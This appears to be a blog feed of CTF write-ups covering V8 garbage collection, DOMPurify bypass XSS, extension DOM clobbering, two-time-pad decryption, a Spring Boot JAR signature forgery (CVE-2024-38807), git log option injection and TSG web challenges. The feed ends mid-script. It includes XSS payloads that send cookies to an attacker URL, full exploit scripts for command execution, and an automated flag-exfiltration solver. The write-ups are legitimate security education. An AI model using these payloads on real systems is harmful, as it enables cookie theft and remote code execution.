-  setTimeout(async () => {
-    await user();
-  }, 1000);
+  await user();

Well, the flag disappears again...

When we review the solution further, we may catch another point: We can occupy enough memory by either many bills or large bills, and it seems that we do not need both of them.

If we do not exploit the bill denomination, we can create only 101 bills3, and we will need a very long signature. Its reasonable that this does not work, as it will exceed the buffer length limit somewhere or take too long to send.

But what if we create more bills, with only small ones?

-# large signature
-p.sendlineafter(b'5):', b'3')
-p.sendlineafter(b'bills):', b'a' * 10000)
-
-# withdraw 1e4 bills
+# withdraw many small bills
 p.sendlineafter(b'5):', b'2')
 p.sendlineafter(b'withdraw:', b'1')
-p.sendlineafter(b'denomination:', b'1e-4')
+p.sendlineafter(b'denomination:', b'5e-6')

It seems that we have not occupied enough memory and the bank manager still exists.

Lets tweak the denomination precisely:

  • 4.9e-6Out of memory
  • 4.95e-6User already exists
  • 4.925e-6User already exists
  • 4.9125e-6Out of memory
  • ……

Do we really need to be that precise? Lets try with a large signature again:

  • 'a' * 10000 & 1e-4flag
  • 'a' * 7000 & 1e-4flag
  • 'a' * 5000 & 1e-4User already exists
  • 'a' * 15000 & 1e-4flag
  • 'a' * 20000 & 1e-4Out of memory
  • 'a' * 10000 & 1.5e-4flag
  • 'a' * 10000 & 2e-4User already exists
  • ……

This time we have a large fault tolerance range. So the fact is that we have to use a large signature. Small bills dont work, and the signature part in the challenge is not redundant.

If you are even more suspicious, you may find it weird to use a Uint8Array for storing the signature.

If its directly copied as a string, only a reference of the string will be stored in each Bill, so it will not occupy enough memory. We can verify this by setting the signature to 10000 characters and withdraw one token with a denomination of 5e-6, and it will neither give the flag nor run out of memory.

-    this.signature = new Uint8Array(signature.length);
-    for (let i = 0; i < signature.length; i++) {
-      this.signature[i] = signature.charCodeAt(i);
-    }
+    this.signature = signature;

However, even if we want to clone each character one by one, we can also use a traditional array, instead of the fancy Uint8Array:

-    this.signature = new Uint8Array(signature.length);
+    this.signature = new Array(signature.length);

The flag disappears again. This time it runs out of memory at a denomination of 6.5e-4 and says the user already exists at 6.6e-4.

Its about the ArrayBuffer, not the size of each element. Float64Array can also be used to get the flag:

-    this.signature = new Uint8Array(signature.length);
+    this.signature = new Float64Array(signature.length);

Inspector, Jobs, and WeakRef

Just like F12 for the browser, we can also use DevTools for Deno via an inspector.

-docker = 'docker run --rm -i -m 100m -v ./index.js:/index.js:ro denoland/deno'
-deno = 'deno run --v8-flags=--trace-gc --allow-read /index.js'
+docker = 'docker run --rm -i -m 200m --net host -v ./index.js:/index.js:ro denoland/deno'
+deno = 'deno run --inspect-brk --v8-flags=--trace-gc --allow-read index.js'
  1. Modify the command-line arguments as above. We run deno with --inspect-brk to enable the inspector and pause at the start. We use --net host to expose the inspector to the host so that it can be accessed in Chrome. We need to set a larger memory limit or the inspector will not work.
  2. Run the solve script with a non-random username.
  3. Open chrome://inspect in Chrome. There we can see the remote target and inspect it.
  4. Set breakpoints by clicking the line numbers in the Sources tab. Here we set a breakpoint after creating the bills.
  5. Click the resume button or press F8.
  6. Take a heap snapshot in the Memory tab.
  7. In the snapshot, we can inspect all the objects. Sort them by distance, so that the most relevant ones, Bill and User, will be listed on the top.

There are two User objects, the bank manager and the current user. In the Retainers tab, we can see why the selected object is not garbage collected.

The current user is of course retained, as its referenced by the currentUser variable:

current user’s retainers, including the currentUser variable

What about the bank manager?

bank manager’s only retainer is weak_refs_keep_during_job

The only retainer of the bank manager is something called weak_refs_keep_during_job. With this hint, we can find the answer in WeakRef - JavaScript | MDN:

If your code has just created a WeakRef for a target object, or has gotten a target object from a WeakRef's deref method, that target object will not be reclaimed until the end of the current JavaScript job (including any promise reaction jobs that run at the end of a script job). That is, you can only "see" an object get reclaimed between turns of the event loop.

Even if you are not familiar with the JavaScript event loop, you may have already grasped how it works:

  • When we set a username by ourselves, the input is checked for duplicate by accessing existing users, which will dereference the WeakRef containing the bank manager, preventing it from being reclaimed during the current job. However, when using a random username, that branch will not access the bank manager.
  • The setTimeout creates a separate job to run the user function, while the bank manager is created outside in the init function.

To learn more about JavaScript jobs, you can read Event loop: microtasks and macrotasks - javascript.info, or the EMCAScript specification (really?).

Major/Minor GC and WeakRef

In order to understand the remaining Q3 and Q4, we need to dive deeper into how the garbage collector works, e.g. through A tour of V8: Garbage Collection, Trash talk: the Orinoco garbage collector, or you can search for other blog posts that might be more accessible for you.

The garbage collector splits the memory heap into two spaces, the new space to store the young generation objects, and the old space to store the old ones. A minor GC (Scavenge) happens frequently to collect some short-lived objects, while a major GC happens much less frequently to collect the remaining objects.

Lets see it in action first.

With a large signature:

1186 ms: Scavenge 6.9 (8.1) -> 6.8 (9.1) MB, pooled: 0 MB, 1.52 / 0.00 ms  (average mu = 1.000, current mu = 1.000) allocation failure;
1202 ms: Scavenge 6.9 (9.1) -> 6.9 (12.1) MB, pooled: 0 MB, 3.04 / 0.00 ms  (average mu = 1.000, current mu = 1.000) allocation failure;
1422 ms: Mark-Compact 8.5 (12.1) -> 8.3 (13.1) MB, pooled: 0 MB, 33.82 / 0.00 ms  (+ 18.8 ms in 0 steps since start of marking, biggest step 0.0 ms, walltime since start of marking 66 ms) (average mu = 0.968, current mu = 0.968) finalize incremental marking via stack guard; GC in old space requested

With a small signature or normal array instead of ArrayBuffer:

1107 ms: Scavenge 6.9 (7.9) -> 6.8 (8.9) MB, pooled: 0 MB, 4.81 / 0.00 ms  (average mu = 1.000, current mu = 1.000) allocation failure;
1117 ms: Scavenge 6.9 (8.9) -> 6.9 (11.6) MB, pooled: 0 MB, 3.58 / 0.00 ms  (average mu = 1.000, current mu = 1.000) allocation failure;
1128 ms: Scavenge 8.8 (11.9) -> 8.7 (12.1) MB, pooled: 0 MB, 1.58 / 0.00 ms  (average mu = 1.000, current mu = 1.000) allocation failure;
1131 ms: Scavenge 8.9 (12.1) -> 8.9 (17.9) MB, pooled: 0 MB, 2.50 / 0.00 ms  (average mu = 1.000, current mu = 1.000) allocation failure;
1153 ms: Scavenge 12.9 (18.1) -> 12.8 (26.6) MB, pooled: 0 MB, 4.72 / 0.00 ms  (average mu = 1.000, current mu = 1.000) allocation failure;
1182 ms: Scavenge 17.3 (26.8) -> 17.4 (46.8) MB, pooled: 0 MB, 6.31 / 0.00 ms  (average mu = 1.000, current mu = 1.000) allocation failure;
1246 ms: Scavenge 30.0 (47.8) -> 29.6 (84.2) MB, pooled: 0 MB, 13.22 / 0.00 ms  (average mu = 1.000, current mu = 1.000) allocation failure;
1692 ms: Scavenge 52.0 (86.3) -> 51.2 (160.5) MB, pooled: 0 MB, 227.47 / 0.00 ms  (average mu = 1.000, current mu = 1.000) allocation failure;

We can see that there is no Mark-Compact (major GC) but only Scavenge (minor GC) when using small bills. Now we have two new questions:

A weak reference does not prevent the referent from being reclaimed by the garbage collector, but it does prevent the Scavenge from reclaiming it. It seems that this is not documented, but we can find it in the V8 source code: v8/src/heap/scavenger.cc:

    // Treat weak references as strong.
    // TODO(marja): Proper weakness handling in the young generation.

We can verify this with the following code:

const ref = new WeakRef({});

setTimeout(() => {
  for (let i = 0; i < 100000; i++) {
    const _ = { a: i };
  }
  console.log(ref.deref());
});

setTimeout(() => {
  gc();
  console.log(ref.deref());
});
$ deno run --v8-flags=--trace-gc,--expose-gc test.js
20 ms: Scavenge 6.8 (7.8) -> 5.8 (8.8) MB, pooled: 0 MB, 0.22 / 0.00 ms  (average mu = 1.000, current mu = 1.000) allocation failure; 
21 ms: Scavenge 6.8 (8.8) -> 5.8 (8.8) MB, pooled: 0 MB, 0.20 / 0.00 ms  (average mu = 1.000, current mu = 1.000) allocation failure; 
{}
24 ms: Mark-Compact 5.8 (8.8) -> 5.8 (8.6) MB, pooled: 0 MB, 2.14 / 0.00 ms  (average mu = 0.902, current mu = 0.902) testing; GC in old space requested
undefined

As a weakly referenced object, the bank manager will survive the minor GC and only be reclaimed in a major GC.

External Memory and Major GC Triggers

So whats special about an ArrayBuffer?

ArrayBuffer is allocated in neither the new space nor the old space, but in the external memory outside of the heap. If the external memory exceeds the limit, it will trigger external memory pressure and immeidately start a major GC (an incremental marking): v8/src/heap/heap.cc

  uint64_t soft_limit = external_memory_.soft_limit();
  if (current <= soft_limit) {
    return;
  }
  TRACE_EVENT2("devtools.timeline,v8", "V8.ExternalMemoryPressure",
               "external_memory_mb", static_cast<int>((current) / MB),
               "external_memory_soft_limit_mb",
               static_cast<int>((soft_limit) / MB));
  if (incremental_marking()->IsStopped()) {
    if (incremental_marking()->CanAndShouldBeStarted()) {
      StartIncrementalMarking(GCFlagsForIncrementalMarking(),
                              GarbageCollectionReason::kExternalMemoryPressure,
                              kGCCallbackFlagsForExternalMemory);
    } else {
      CollectAllGarbage(i::GCFlag::kNoFlags,
                        GarbageCollectionReason::kExternalMemoryPressure,
                        kGCCallbackFlagsForExternalMemory);
    }
  } else {
    // Incremental marking is turned on and has already been started.
    current_gc_callback_flags_ = static_cast<GCCallbackFlags>(
        current_gc_callback_flags_ | kGCCallbackFlagsForExternalMemory);
    incremental_marking()->AdvanceAndFinalizeIfNecessary();
  }

Where the soft_limit is initially 64MiB:

v8/src/heap/heap.h

    uint64_t soft_limit() const {
      return low_since_mark_compact() + kExternalAllocationSoftLimit;
    }

v8/include/v8-internal.h

  // Soft limit for AdjustAmountofExternalAllocatedMemory. Trigger an
  // incremental GC once the external memory reaches this limit.
  static constexpr size_t kExternalAllocationSoftLimit = 64 * 1024 * 1024;

This explains why a large ArrayBuffer can trigger a major GC, but why not a normal array?

With the --trace-incremental-marking V8 flag, we can see that an incremental marking is immediately started when using an ArrayBuffer:

1471 ms: [IncrementalMarking] Start (external memory pressure): (size/waste/limit/slack) v8: 6MB / 0MB / 512MB / 506MB global: 6MB / 0MB / 1024MB / 1018MB
1486 ms: [IncrementalMarking] Start marking
1494 ms: [IncrementalMarking] Black allocation started
……

However, it is only scheduled but not started when using a normal array:

1428 ms: Scavenge 66.7 (102.4) -> 63.5 (197.9) MB, pooled: 0 MB, 72.03 / 0.00 ms  (average mu = 1.000, current mu = 1.000) allocation failure;
1428 ms: [IncrementalMarking] Job: Schedule

This scheduling is happened in the StartIncrementalMarkingIfAllocationLimitIsReached function:

      case IncrementalMarkingLimit::kHardLimit:
        if (local_heap->is_main_thread_for(this)) {
          StartIncrementalMarking(
              gc_flags,
              OldGenerationSpaceAvailable() <= NewSpaceTargetCapacity()
                  ? GarbageCollectionReason::kAllocationLimit
                  : GarbageCollectionReason::kGlobalAllocationLimit,
              gc_callback_flags);
        } else {
          ExecutionAccess access(isolate());
          isolate()->stack_guard()->RequestStartIncrementalMarking();
          if (auto* job = incremental_marking()->incremental_marking_job()) {
            job->ScheduleTask();
          }
        }
        break;
      case IncrementalMarkingLimit::kSoftLimit:
        if (auto* job = incremental_marking()->incremental_marking_job()) {
          job->ScheduleTask(TaskPriority::kUserVisible);
        }
        break;

By default, only the soft limit but not the hard limit is hit. If we set the V8 flag --incremental-marking-hard-trigger=60, it will hit the hard limit and immediately trigger a major GC.

Congratulations! You have followed this tour and now understand how this seemingly simple CTF challenge actually works, with basic knowledge about the V8 garbage collector.

……But wait, heres one last question, and Ill leave it for interesting readers:

Footnotes

  1. Opposite to what I did during the event, in this write-up, I present the correct solution and raise questions to it before investigating the underlying mechanisms. And I actually made some incorrect hypotheses during the event and found that they are wrong when writing this write-up. I spent some more time investigating it and I was kind of busy, so this write-up is posted one month after the event.

  2. memory - Does 'ulimit -m' not work on (modern) Linux? - Unix & Linux Stack Exchange

  3. If I were the challenge writer, I will probably set a lower balance, as Im afraid if it can be solved without a small denomination.

]]> writeup ctf <![CDATA[TPCTF 2025 Official Write-Up (6 challenges)]]> https://ouuan.moe/post/2025/03/tpctf-2025 https://ouuan.moe/post/2025/03/tpctf-2025 Tue, 11 Mar 2025 05:32:30 GMT TPCTF 2025 official write-up for my challenges: baby/safe layout (revenge), Are you incognito, encrypted chat, and verified toolbox.

]]> TPCTF 2025 official write-up for my challenges: baby/safe layout (revenge), Are you incognito, encrypted chat, and verified toolbox.

Official repository with write-up and source code

This is my first time to write challenges in a public CTF. Feel free to leave a comment or add a reaction below if you have unintended solutions / suggestions / anything to say.

baby layout (81 solves)

One solution is to put {{content}} inside an attribute and to close the quote in the inner payload:

<img src="{{content}}">
" onerror="fetch('{YOUR_URL}'+document.cookie)

An alternative solution is to close a <textarea>, like Bad usage | Not enough context | Exploring the DOMPurify library: Hunting for Misconfigurations (2/2) | mizu.re:

<textarea>{{content}}</textarea>
<div id="</textarea><img src=x onerror=fetch('{YOUR_URL}'+document.cookie)>"></div>

safe layout (50 solves)

I made a mistake not banning data and aria attributes (ALLOW_DATA_ATTR and ALLOW_ARIA_ATTR)1, so it can be solved in the same way as the baby version by using data-x or aria-x instead of other attributes like src.

safe layout revenge (29 solves)

Tips: You can use Dom-Explorer to see DOMPurify output. Its a great tool for playing with mXSS and sanitizers.

We need to get a malicious tag without using attributes. Normally, malicious tags will be either removed or escaped, but we can get unescaped angle brackets in <style>. DOMPurify is very strict and any HTML tags in <style> will be filtered. However, the regular expression only checks for /<[/\w]/, so <{{content}} will not be filtered and can be used to get malicious tags.

Here the inner payload is used twice, first to close the <style> tag and then to create the <img> tag:

a<style>{{content}}<{{content}}</style>
img src onerror=fetch(`{YOUR_URL}/`+document.cookie) <style></style>

Another solution is similar but uses an empty {{content}}, like CVE-2023-482191.

Are you incognito? (3 solves)

Notice that the bot runs Chromium but the extension uses browser instead of chrome to access the extension API. It uses webextension-polyfill to provide the API under browser. We can pass the check if we modify the browser object. We cannot directly create JavaScript variables since the web page and the content script run JavaScript separately, but we can use DOM clobbering to do so.

We need browser.runtime.id to pass the check in webextension-polyfill and then browser.extension.inIncognitoContext to pass the check in the challenge:

<form id="browser" name="runtime"></form>
<form id="browser" name="extension">
  <input name="inIncognitoContext">
</form>

An alternative solution is found by USTC-NEBULA, that is to create a global variable exports instead of browser.runtime.id to pass the check in babel-transform-to-umd-module.js.

Some sites such as webhook.site use path instead of subdomain for each user and are thus unable to record the /flag request. You can use requestrepo.com or your own server.

This appears to be a 0-day vulnerability2, but I couldnt find a practical way to exploit it in real-world extensions. I suspect it may at most disrupt the normal execution of content scripts without posing significant security risks or providing strong attack incentives. Anyhow, I will report this to the upstream after the competition. Its at least a bug if not a vulnerability.

P.S. A similar bug was once discovered and fixed in #153 but later introduced again in #582.

encrypted chat (15 solves)

All senders share the same key stream, so race condition will happen if two participants send messages at the same time, before receiving the message sent from the other side, and then the key stream will be reused.

So we need to locate the parts where the key is reused and then decrypt them. Since the messages are in ASCII, we can use the highest bit in each byte to find reused key. The remaining of this challenge is this assignment in CS255.

A simple approach is to XOR the messages and notice that XORing a letter with a space is to toggle its casing. So a character is likely to be a space if its XORs with others are letters. Then manually fix the broken words.

Another approach is to use some language model (e.g. GPT, a small one is enough) to calculate the probability of the next character (use the internal results, not to ask an AI assistant) and apply the Viterbi algorithm. Reference: A Natural Language Approach to Automated Cryptanalysis of Two-time Pads. This approach is more accurate but too expensive to implement during a CTF.3

Or you can use the known plaintext TPCTF{ as a starting point.

Heres my script with an interactive solver to fix the broken words:

import json
from base64 import b64decode, b64encode
from string import ascii_letters

def solve(ciphertexts: list[bytes]):
    n = len(ciphertexts)
    m = len(ciphertexts[0])
    key = bytearray(m)
    for i in range(m):
        count = [0] * n
        for j, x in enumerate(ciphertexts):
            for k, y in enumerate(ciphertexts[:j]):
                if chr(x[i] ^ y[i]) in ascii_letters:
                    count[j] += 1
                    count[k] += 1
        key[i] = 32 ^ ciphertexts[count.index(max(count))][i]
    plaintexts = []
    for ciphertext in ciphertexts:
        plaintext = bytes(c ^ k for c, k in zip(ciphertext, key))
        plaintexts.append(b64encode(plaintext).decode())
    print(json.dumps(plaintexts))

with open('messages.txt') as f:
    stream = b64decode(f.read())

n = len(stream)
high_bits = bytes([b >> 7 for b in stream])

i = 0
while i < n:
    if high_bits.count(high_bits[i:i+50], i) < 5:
        i += 1
        continue
    l = i + 10
    r = i + 40
    k = high_bits.count(high_bits[l:r], i)
    while high_bits.count(high_bits[l-1:r], i) == k:
        l -= 1
    while high_bits.count(high_bits[l:r+1], i) == k:
        r += 1
    pattern = high_bits[l:r]
    ciphertexts = []
    while (p := high_bits.find(pattern, i)) != -1:
        ciphertexts.append(stream[p:p+len(pattern)])
        i = p + len(pattern)
    solve(ciphertexts)
<!DOCTYPE html>

<html>

<head>
  <meta charset="utf-8">
  <title>Encrypted Chat Solver</title>
  <script src="https://unpkg.com/vue@3/dist/vue.global.prod.js"></script>
</head>

<body>
  <div id="app">
    <label>Input: <input v-model="input"></label>
    <div style="font-family: monospace; font-size: 1rem; white-space: pre;">
      <div v-for="(plaintext, i) of plaintexts" :key="i" style="margin-top: 1rem; display: flex; gap: 1px;">
        <div v-for="(c, p) in plaintext" :key="p" @click="changeKey(i, p, c)" style="padding: 1px; cursor: pointer;">
          <span v-if="isAsciiPrintable(c)">{{ c }}</span>
          <span v-else style="color: red;">?</span>
        </div>
      </div>
    </div>
  </div>

  <script>
    const {createApp, ref, computed, watch} = Vue;

    createApp({
      setup() {
        const input = ref('');

        const bases = computed(() => {
          try {
            return JSON.parse(input.value).map((b64) => Array.from(atob(b64)));
          } catch {
            return [];
          }
        });

        const key = ref([]);
        watch(bases, (stream) => {
          key.value = new Array(bases[0]?.length).fill(0);
        });

        const plaintexts = computed(() =>
          bases.value.map((base) => {
            return base.map((c, i) => String.fromCharCode(c.charCodeAt(0) ^ key.value[i]));
          })
        );

        function isAsciiPrintable(c) {
          return c.charCodeAt(0) >= 32 && c.charCodeAt(0) <= 126;
        }

        function changeKey(i, p, oldChar) {
          const newChar = prompt(`Change '${oldChar}' to:`, oldChar)?.[0];
          if (!newChar) return;
          key.value[p] ^= plaintexts.value[i][p].charCodeAt(0) ^ newChar.charCodeAt(0);
        }

        return {
          input,
          plaintexts,
          isAsciiPrintable,
          changeKey,
        }
      },
    }).mount('#app');
  </script>
</body>

</html>

verified toolbox (1 solve)

It uses Spring Boot 3.3.2, so its CVE-2024-38807: Signature Forgery Vulnerability in Spring Boots Loader4.

The vulnerability is that spring-boot-loader uses JarInputStream to verify the signatures but uses a custom ZipContent class to load the contents. They parse a ZIP file differently and may read different contents from a specially crafted JAR file. JarInputStream reads a JAR file from start to end, while ZipContent read the end of central directory record at the end first. We can construct a malicious JAR file by concatenating the bytes of two JAR files, and then adjust the offset fields in the central directory headers and the end of central directory record of the second JAR file. The signature verifier will read the first JAR file while the content loader will read the second.

You can also find the commit that fixes this vulnerability along with the mismatched.jar test case, and then create the malicious JAR file based on mismatched.jar.

#!/bin/bash

set -euo pipefail

url="$1"

javac Tool.java

jar cf exp.jar Tool.class

rm -f keystore.jks

keytool -genkeypair \
    -alias exp \
    -dname 'CN=Unknown, OU=Unknown, O=Unknown, L=Unknown, ST=Unknown, C=Unknown' \
    -keyalg DSA \
    -keysize 2048 \
    -validity 1 \
    -keystore keystore.jks \
    -storepass 133337

jarsigner -keystore keystore.jks -storepass 133337 exp.jar exp

curl -O "$url/toolbox/greeting.jar"
jar xf greeting.jar

python exp.py

jar cf0 nested.jar inner.jar

curl -F file=@nested.jar -F path=inner.jar -F input='/readflag give me the flag' "$url"/run
with open('hello.jar', 'rb') as f:
    signed = f.read()

with open('exp.jar', 'rb') as f:
    exp = f.read()

shift = len(signed)
exp_list = list(exp)

eocd_start = exp.rfind(b'PK\x05\x06')
cd_offset = int.from_bytes(exp[eocd_start+16:eocd_start+20], 'little')
new_cd_offset = (cd_offset + shift).to_bytes(4, 'little')
exp_list[eocd_start+16:eocd_start+20] = new_cd_offset

cd_start = cd_offset
pos = cd_start
while pos < eocd_start:
    if exp[pos:pos+4] == b'PK\x01\x02':
        lfh_offset = int.from_bytes(exp[pos+42:pos+46], 'little')
        new_lfh_offset = (lfh_offset + shift).to_bytes(4, 'little')
        exp_list[pos+42:pos+46] = new_lfh_offset
        pos += 46
    else:
        pos += 1

modified_exp = bytes(exp_list)
with open('inner.jar', 'wb') as f:
    f.write(signed)
    f.write(modified_exp)
import java.io.ByteArrayOutputStream;

public class Tool {
    public static String run(String cmd) {
        try {
            ProcessBuilder processBuilder = new ProcessBuilder("sh", "-c", cmd);
            Process process = processBuilder.start();

            ByteArrayOutputStream bos = new ByteArrayOutputStream();
            bos.write(String.format("\n$ %s\n", cmd).getBytes());

            process.getInputStream().transferTo(bos);
            process.getErrorStream().transferTo(bos);

            return bos.toString();
        } catch (Exception e) {
            return e.getMessage();
        }
    }
}

Footnotes

  1. I created this challenge before this blog post was published. I did notice it before the event, but apparently I did not read it very carefully :( 2

  2. The original version of this challenge was a line const api = globalThis.browser || globalThis.chrome instead of the library, but I thought it was too obvious and then found that webextension-polyfill was also vulnerable.

  3. I have actually implemented something similar before. It was able to decrypt MTP for various file types besides natural language. Specifically, it was used to decrypt the Conti ransomware.

  4. This CVE is found by me.

]]> writeup ctf <![CDATA[ASIS CTF Finals 2024 Write-Up]]> https://ouuan.moe/post/2024/12/asis-ctf-finals-2024 https://ouuan.moe/post/2024/12/asis-ctf-finals-2024 Sun, 29 Dec 2024 14:17:41 GMT Write-up for ASIS CTF Finals 2024 — Web challenges fetch-box and gitmails.

]]> Write-up for ASIS CTF Finals 2024 — Web challenges fetch-box and gitmails.

fetch-box (19 solves)

Use PerformanceObserver to observe fetch requests:

new PerformanceObserver((list) => {
    list.getEntries().forEach((entry) => {
        if (entry.name.includes('/ping?')) {
            location = 'https://*.requestrepo.com/' + entry.name;
        }
    });
}).observe({entryTypes: ['resource']});

BTW, service worker does not work because it's not HTTPS.

gitmails (5 solves)

git log option injection

            emails = check_output(
                ['git', 'log', '--pretty=format:%ae', 
                *([f'--author={author}'] if author else []),
                branch],
                cwd=repo_dir

Here the branch is supposed to be a branch, but it will be an option if it starts with -.

The git CLI does not allow such branch names, but we can modify the refs directly. For example:

cp .git/refs/heads/master .git/refs/heads/--output=config

git log --output for file writing

We can use git log --output to write the log to arbitrary file. Find this in man git log or git | GTFOArgs.

As --pretty=format:%ae is set, we can use the email of each commit for each line in the output, e.g.:

GIT_AUTHOR_EMAIL="pager = /readflag" git commit --allow-empty -m nothing
GIT_AUTHOR_EMAIL='[core]' git commit --allow-empty -m nothing

Approaches that do not work

  • core.fsmonitor: It's on GTFOArgs but it's not triggered by git log.
  • core.pager: The output pipes into the check_output function without an interactive tty, so Git does not use a pager.
  • core.alternateRefsCommand: Need a known path to an objects directory that is not the current repository.
  • diff.external / diff.<driver>.command: Need both -p and --ext-diff but we can only inject a single option.

textconv for command execution

diff.<driver>.textconv can be used to execute arbitrary command with git log -p.

The textconv command is called as <cmd> <filename>, so we can use textconv = /readflag '--give-me-the-f|ag' | tee to output the flag.

We need to set the diff driver in the info/attributes file, such as * [diff=flag] and [diff "flag"] textconv = /readflag.

However, we only have a single commit log (the branch argument is used as an option instead), so we will have identical config and info/attributes, but they have different syntax and contents.

The config needs to be completely valid, while attributes may have syntax errors. So we can append a= diff=flag to config, which is the attribute we need and also a valid line in config. Then add a file with name a= in the repository to see the diff.

Hosting the repository

If we don't want to use a public service like GitHub, we should host the repository to support read-only HTTP clone.

It's actually super easy. Just run git --bare update-server-info in the .git directory and run an HTTP server.

Final script

#!/bin/bash

set -euo pipefail

mkdir exp
cd exp
git init

touch a=
git add .
GIT_AUTHOR_EMAIL='a= diff=flag' git commit -m nothing
GIT_AUTHOR_EMAIL="textconv = /readflag '--give-me-the-f|ag' | tee" git commit --allow-empty -m nothing
GIT_AUTHOR_EMAIL='[diff "flag"]' git commit --allow-empty -m nothing

cd .git
cp refs/heads/master refs/heads/--output=config
mkdir refs/heads/--output=info
cp refs/heads/master refs/heads/--output=info/attributes
cp refs/heads/master refs/heads/-p

git --bare update-server-info
python -m http.server 1337

Then ask the challenge server to clone your HTTP git server.

]]> writeup ctf <![CDATA[TSG CTF 2024 Web Write-Up]]> https://ouuan.moe/post/2024/12/tsgctf-2024-web https://ouuan.moe/post/2024/12/tsgctf-2024-web Tue, 17 Dec 2024 03:39:37 GMT Write-up for all TSG CTF 2024 Web challenges (solved by me and blue-lotus team members).

]]> Write-up for all TSG CTF 2024 Web challenges (solved by me and blue-lotus team members).

Toolong Tea (143 solves)

Solved independently by @gml-sec, @Eki, and me.

{ "num": [65536, 1, 1] }

I Have Been Pwned (24 solves)

Solved collaboratively by @Eki, @wdeilim, @gml-sec, and me.

PHP debug message leak

Leak first 15 characters of pepper1:

$ curl http://34.84.32.212:8080/ -d 'auth=guest&password=%00'
<br />
<b>Fatal error</b>:  Uncaught ValueError: Bcrypt password must not contain null character in /var/www/html/index.php:21
Stack trace:
#0 /var/www/html/index.php(21): password_hash('PmVG7xe9ECBSgLU...', '2y')
#1 {main}
    thrown in <b>/var/www/html/index.php</b> on line <b>21</b><br />

Leak admin_password:

$ curl http://34.84.32.212:8080/ -d 'auth=admin&password[]=' 
<br />
<b>Fatal error</b>:  Uncaught TypeError: hash_equals(): Argument #2 ($user_string) must be of type string, array given in /var/www/html/index.php:13
Stack trace:
#0 /var/www/html/index.php(13): hash_equals('KeTzkrRuESlhd1V', Array)
#1 {main}
    thrown in <b>/var/www/html/index.php</b> on line <b>13</b><br />

BCrypt truncating

BCrypt truncates the password to the first 72 characters. So we can truncate pepper2 and get the last character of pepper1 and each character of pepper2 by enumerating each value and verify the password hash.

import requests
from bcrypt import checkpw, hashpw, gensalt
from base64 import b64decode, b64encode

URL = 'http://34.84.32.212:8080'

pepper1 = 'PmVG7xe9ECBSgLU'
admin_password = 'KeTzkrRuESlhd1V'
pepper2 = ''

def hash(password):
    res = requests.post(URL, data={'auth': 'guest', 'password': password}, allow_redirects=False)
    b64 = res.cookies.get('hash')
    assert b64 is not None
    return b64decode(b64)

h = hash('a' * 100)
for i in range(256):
    pw = (pepper1 + chr(i) + 'guest').ljust(72, 'a')
    if checkpw(pw.encode(), h):
        pepper1 += chr(i)
        break
print(pepper1)

for i in range(16):
    password = 'a' * (50 - i)
    h = hash(password)
    for j in range(256):
        pw = pepper1 + 'guest' + password + pepper2 + chr(j)
        if checkpw(pw.encode(), h):
            pepper2 += chr(j)
            print(pepper2)
            break

h = hashpw((pepper1 + 'admin' + admin_password + pepper2).encode(), gensalt())
h = b64encode(h).decode()
res = requests.get(f'{URL}/mypage.php', cookies={'auth': 'admin', 'hash': h})
print(res.text)

Cipher Preset Button (19 solves)

Solved by me and @NanoApe.

<base> redirecting

meta and link are not allowed in titleElem, but <base> is not banned in either HTML sanitizer or CSP, so we can change the base URI to redirect the request to /result to our server. Then we can use a 25-character prefix to get the first 25 characters of the flag.

Crack Math.random

Using an empty prefix, we can get the first 25 Math.floor(Math.random() * 65536) and we need to predict the next 23.

There is https://github.com/d0nutptr/v8_rand_buster, and we need to adjust the random-state-to-double conversion part for Firefox. Refer to XorShift128PlusRNG.h.

@@ -17,7 +17,7 @@ def xs128p(state0, state1):
     s1 ^= (s0 >> 26) & 0xFFFFFFFFFFFFFFFF
     state0 = state1 & 0xFFFFFFFFFFFFFFFF
     state1 = s1 & 0xFFFFFFFFFFFFFFFF
-    generated = state0 & 0xFFFFFFFFFFFFFFFF
+    generated = (state0 + state1) & 0xFFFFFFFFFFFFFFFF
def sym_floor_random(slvr, sym_state0, sym_state1, generated, multiple):
    sym_state0, sym_state1 = sym_xs128p(sym_state0, sym_state1)

    calc = (sym_state0 + sym_state1) & BitVecVal((1 << 53) - 1, 64)

    coef = (1 << 53) / multiple
    lower = int(generated * coef)
    upper = int((generated + 1) * coef)

    slvr.add(ULE(BitVecVal(lower, 64), calc))
    slvr.add(ULE(calc, BitVecVal(upper, 64)))

    return sym_state0, sym_state1


def to_double(value):
    return (value & ((1 << 53) - 1)) / (1 << 53)

Automatic solve script

I refined the script after the contest to make it fully automatic. (I dont know why I did this, maybe just to save some explanations on how to run it :)

Z3 solving needs a few CPU hours, so be patient.

It needs public IPv4 access. Use services like requestrepo.com or app.interactsh.com otherwise.

# Receive requests

from flask import Flask, request, make_response
from threading import Thread

URL = "http://104.198.119.144:7891"
PORT = 1337
MAX_PREFIX_LEN = 25
FLAG_LEN = 48

flag = ""

app = Flask(__name__)


@app.route("/result", methods=["OPTIONS"])
def cors():
    response = make_response()
    response.headers["Access-Control-Allow-Origin"] = "*"
    response.headers["Access-Control-Allow-Headers"] = "Content-Type"
    return response


@app.post("/result")
def post_result():
    global flag
    assert request.json
    prefix = request.json["prefix"]
    result = request.json["result"]
    if flag == "":
        for i in range(MAX_PREFIX_LEN):
            flag += chr(ord(prefix[i]) ^ int(result[i * 4 : i * 4 + 4], 16))
        print(flag)
    else:
        points = []
        for i in range(MAX_PREFIX_LEN):
            points.append(ord(flag[i]) ^ int(result[i * 4 : i * 4 + 4], 16))
        print("Start solving")
        seeds = solve(points, 65536)
        points = gen(seeds, 65536, FLAG_LEN)
        for i in range(MAX_PREFIX_LEN, FLAG_LEN):
            flag += chr(points[i] ^ int(result[i * 4 : i * 4 + 4], 16))
        print(flag)
        quit()
    return "ok"


Thread(target=lambda: app.run(host="0.0.0.0", port=PORT)).start()

# Send requests

import requests
from time import sleep

requests.packages.urllib3.util.connection.HAS_IPV6 = False
ip = requests.get("https://ifconfig.me").text
name = f'</title><base href="http://{ip}:{PORT}"/><title>'


def report(prefix):
    res = requests.post(f"{URL}/preset", json={"name": name, "prefix": prefix})
    id = res.json()["id"]
    res = requests.post(f"{URL}/report", json={"path": f"/presets/{id}"})
    print(res.text)


report("A" * MAX_PREFIX_LEN)
sleep(5)
report("")

# Crack Math.random
# https://github.com/d0nutptr/v8_rand_buster

from os import cpu_count
from z3 import *

MAX_UNUSED_THREADS = 2


def xs128p(state0, state1):
    s1 = state0 & 0xFFFFFFFFFFFFFFFF
    s0 = state1 & 0xFFFFFFFFFFFFFFFF
